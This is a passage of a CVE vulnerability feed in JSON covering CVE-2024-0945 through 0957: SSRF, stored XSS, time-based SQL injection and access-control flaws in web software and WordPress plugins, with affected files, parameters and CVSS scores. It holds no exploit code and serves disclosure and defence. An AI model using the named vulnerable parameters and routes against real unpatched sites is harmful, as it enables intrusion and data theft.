cstecgi.cgi session expiration", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.269681", "name" : "Submit #269681 | Totolink T8 V4.1.5cu.833_20220905 Insufficient Session Expiration", "refsource" : "", "tags" : [ ] }, { "url" : "https://vuldb.com/?submit.269681", "name" : "Submit #269681 | Totolink T8 V4.1.5cu.833_20220905 Insufficient Session Expiration", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Totolink T8 4.1.5cu.833_20220905. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252188. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:t8_firmware:4.1.5cu.833_20220905:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:t8:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-26T20:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0945", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-918" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/7F54gy22y7uJ", "name" : "https://note.zhaoj.in/share/7F54gy22y7uJ", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/7F54gy22y7uJ", "name" : "https://note.zhaoj.in/share/7F54gy22y7uJ", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.252189", "name" : "https://vuldb.com/?ctiid.252189", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.252189", "name" : "https://vuldb.com/?ctiid.252189", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.252189", "name" : "https://vuldb.com/?id.252189", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.252189", "name" : "https://vuldb.com/?id.252189", "refsource" : "", "tags" : [ "Permissions Required" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in 60IndexPage up to 1.8.5. This affects an unknown part of the file /include/file.php of the component Parameter Handler. The manipulation of the argument url leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252189 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:60indexpage_project:60indexpage:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-26T21:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0946", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-918" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/iNSyaClT0hGi", "name" : "https://note.zhaoj.in/share/iNSyaClT0hGi", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/iNSyaClT0hGi", "name" : "https://note.zhaoj.in/share/iNSyaClT0hGi", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.252190", "name" : "https://vuldb.com/?ctiid.252190", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.252190", "name" : "https://vuldb.com/?ctiid.252190", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.252190", "name" : "https://vuldb.com/?id.252190", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.252190", "name" : "https://vuldb.com/?id.252190", "refsource" : "", "tags" : [ "Permissions Required" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in 60IndexPage up to 1.8.5. This vulnerability affects unknown code of the file /apply/index.php of the component Parameter Handler. The manipulation of the argument url leads to server-side request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252190 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:60indexpage_project:60indexpage:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-26T21:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0947", "ASSIGNER" : "cve@usom.gov.tr" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.usom.gov.tr/bildirim/tr-24-0808", "name" : "https://www.usom.gov.tr/bildirim/tr-24-0808", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.usom.gov.tr/bildirim/tr-24-0808", "name" : "https://www.usom.gov.tr/bildirim/tr-24-0808", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Reliance on Cookies without Validation and Integrity Checking vulnerability in Talya Informatics Elektraweb allows Session Credential Falsification through Manipulation, Accessing/Intercepting/Modifying HTTP Cookies, Manipulating Opaque Client-based Data Tokens.This issue affects Elektraweb: before v17.0.68." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-06-27T10:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0948", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/1tcgyzu9Fh3AMG0INR0EdOR7ZjWmBK0ZR/view?usp=sharing", "name" : "https://drive.google.com/file/d/1tcgyzu9Fh3AMG0INR0EdOR7ZjWmBK0ZR/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://drive.google.com/file/d/1tcgyzu9Fh3AMG0INR0EdOR7ZjWmBK0ZR/view?usp=sharing", "name" : "https://drive.google.com/file/d/1tcgyzu9Fh3AMG0INR0EdOR7ZjWmBK0ZR/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.252191", "name" : "VDB-252191 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.252191", "name" : "VDB-252191 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.252191", "name" : "VDB-252191 | NetBox Home Page Configuration config-revisions cross site scripting", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252191", "name" : "VDB-252191 | NetBox Home Page Configuration config-revisions cross site scripting", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.270218", "name" : "Submit #270218 | netbox netbox 3.7.0 XSS", "refsource" : "", "tags" : [ ] }, { "url" : "https://vuldb.com/?submit.270218", "name" : "Submit #270218 | netbox netbox 3.7.0 XSS", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "** DISPUTED ** A vulnerability, which was classified as problematic, has been found in NetBox up to 3.7.0. This issue affects some unknown processing of the file /core/config-revisions of the component Home Page Configuration. The manipulation with the input <

>test

leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. The associated identifier of this vulnerability is VDB-252191. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:netbox:netbox:*:*:*:*:*:*:*:*", "versionEndIncluding" : "3.7.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-26T22:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0949", "ASSIGNER" : "cve@usom.gov.tr" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.usom.gov.tr/bildirim/tr-24-0808", "name" : "https://www.usom.gov.tr/bildirim/tr-24-0808", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.usom.gov.tr/bildirim/tr-24-0808", "name" : "https://www.usom.gov.tr/bildirim/tr-24-0808", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Improper Access Control, Missing Authorization, Incorrect Authorization, Incorrect Permission Assignment for Critical Resource, Missing Authentication, Weak Authentication, Improper Restriction of Communication Channel to Intended Endpoints vulnerability in Talya Informatics Elektraweb allows Exploiting Incorrectly Configured Access Control Security Levels, Manipulating Web Input to File System Calls, Embedding Scripts within Scripts, Malicious Logic Insertion, Modification of Windows Service Configuration, Malicious Root Certificate, Intent Spoof, WebView Exposure, Data Injected During Configuration, Incomplete Data Deletion in a Multi-Tenant Environment, Install New Service, Modify Existing Service, Install Rootkit, Replace File Extension Handlers, Replace Trusted Executable, Modify Shared File, Add Malicious File to Shared Webroot, Run Software at Logon, Disable Security Software.This issue affects Elektraweb: before v17.0.68." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-06-27T10:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0951", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/88b2e479-eb15-4213-9df8-3d353074974e/", "name" : "https://wpscan.com/vulnerability/88b2e479-eb15-4213-9df8-3d353074974e/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/88b2e479-eb15-4213-9df8-3d353074974e/", "name" : "https://wpscan.com/vulnerability/88b2e479-eb15-4213-9df8-3d353074974e/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Advanced Social Feeds Widget & Shortcode WordPress plugin through 1.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:shahaji9:advanced_social_feeds_widget_\\&_shortcode:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.7", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-03-18T19:15Z", "lastModifiedDate" : "2025-03-27T16:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0952", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3060269/erp/tags/1.13.0/modules/accounting/includes/functions/people.php", "name" : "https://plugins.trac.wordpress.org/changeset/3060269/erp/tags/1.13.0/modules/accounting/includes/functions/people.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3060269/erp/tags/1.13.0/modules/accounting/includes/functions/people.php", "name" : "https://plugins.trac.wordpress.org/changeset/3060269/erp/tags/1.13.0/modules/accounting/includes/functions/people.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f3ba06f9-de51-49ea-87c1-4583e939314b?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f3ba06f9-de51-49ea-87c1-4583e939314b?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f3ba06f9-de51-49ea-87c1-4583e939314b?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f3ba06f9-de51-49ea-87c1-4583e939314b?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting plugin for WordPress is vulnerable to time-based SQL Injection via the id parameter in all versions up to, and including, 1.12.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with accounting manager or admin privileges or higher, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wedevs:wp_erp:*:*:*:*:free:wordpress:*:*", "versionEndExcluding" : "1.13.0", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-04-09T19:15Z", "lastModifiedDate" : "2025-01-30T15:54Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0953", "ASSIGNER" : "security@mozilla.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-601" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1837916", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1837916", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking" ] }, { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1837916", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1837916", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-36/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-36/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "When a user scans a QR Code with the QR Code Scanner feature, the user is not prompted before being navigated to the page specified in the code. This may surprise the user and potentially direct them to unwanted content. This vulnerability affects Firefox for iOS < 129." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox:-:*:*:*:*:iphone_os:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-05T17:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0954", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3029928/essential-addons-for-elementor-lite/tags/5.9.8/assets/front-end/js/view/wrapper-link.js", "name" : "https://plugins.trac.wordpress.org/changeset/3029928/essential-addons-for-elementor-lite/tags/5.9.8/assets/front-end/js/view/wrapper-link.js", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3029928/essential-addons-for-elementor-lite/tags/5.9.8/assets/front-end/js/view/wrapper-link.js", "name" : "https://plugins.trac.wordpress.org/changeset/3029928/essential-addons-for-elementor-lite/tags/5.9.8/assets/front-end/js/view/wrapper-link.js", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/875db71d-c799-40b9-95e1-74d53046b0a9?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/875db71d-c799-40b9-95e1-74d53046b0a9?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/875db71d-c799-40b9-95e1-74d53046b0a9?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/875db71d-c799-40b9-95e1-74d53046b0a9?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting through editing context via the 'data-eael-wrapper-link' wrapper in all versions up to, and including, 5.9.7 due to insufficient input sanitization and output escaping on user supplied protocols. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wpdeveloper:essential_addons_for_elementor:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "5.9.7", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0955", "ASSIGNER" : "vulnreport@tenable.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.tenable.com/security/tns-2024-01", "name" : "https://www.tenable.com/security/tns-2024-01", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.tenable.com/security/tns-2024-01", "name" : "https://www.tenable.com/security/tns-2024-01", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "\nA stored XSS vulnerability exists where an authenticated, remote attacker with administrator privileges on the Nessus application could alter Nessus proxy settings, which could lead to the execution of remote arbitrary scripts. \n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:tenable:nessus:*:*:*:*:*:*:*:*", "versionEndExcluding" : "10.7.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-07T00:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0956", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/erp/trunk/modules/accounting/includes/functions/products.php#L387", "name" : "https://plugins.trac.wordpress.org/browser/erp/trunk/modules/accounting/includes/functions/products.php#L387", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/erp/trunk/modules/accounting/includes/functions/products.php#L387", "name" : "https://plugins.trac.wordpress.org/browser/erp/trunk/modules/accounting/includes/functions/products.php#L387", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d4e04650-624a-4440-b166-8de0f24bb1dd?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d4e04650-624a-4440-b166-8de0f24bb1dd?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d4e04650-624a-4440-b166-8de0f24bb1dd?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d4e04650-624a-4440-b166-8de0f24bb1dd?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting plugin for WordPress is vulnerable to time-based SQL Injection via the id parameter via the erp/v1/accounting/v1/vendors/1/products/ REST route in all versions up to, and including, 1.12.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with admin or accounting manager privileges, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wedevs:wp_erp:*:*:*:*:free:wordpress:*:*", "versionEndIncluding" : "1.12.9", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-29T07:15Z", "lastModifiedDate" : "2025-01-30T15:54Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0957", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050923%40print-invoices-packing-slip-labels-for-woocommerce&new=3050923%40print-invoices-packing-slip-labels-for-woocommerce&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050923%40print-invoices-packing-slip-labels-for-woocommerce&new=3050923%40print-invoices-packing-slip-labels-for-woocommerce&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050923%40print-invoices-packing-slip-labels-for-woocommerce&new=3050923%40print-invoices-packing-slip-labels-for-woocommerce&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050923%40print-invoices-packing-slip-labels-for-woocommerce&new=3050923%40print-invoices-packing-slip-labels-for-woocommerce&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c7ba4218-5b60-4e72-b98d-7c95c9fc3d59?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c7ba4218-5b60-4e72-b98d-7c95c9fc3d59?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c7ba4218-5b60-4e72-b98d-7c95c9fc3d59?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c7ba4218-5b60-4e72-b98d-7c95c9fc3d59?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WooCommerce PDF Invoices, Packing Slips, Delivery Notes and Shipping Labels plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Customer Notes field in all versions up to, and including, 4.4.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected invoice for printing." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:webtoffee:woocommerce_pdf_invoices\\,_packing_slips\\,_delivery_notes_and_shipping_labels:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "4.4.2", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-22T02:15Z", "lastModifiedDate" : "2025-02-11T21:43Z" }, { 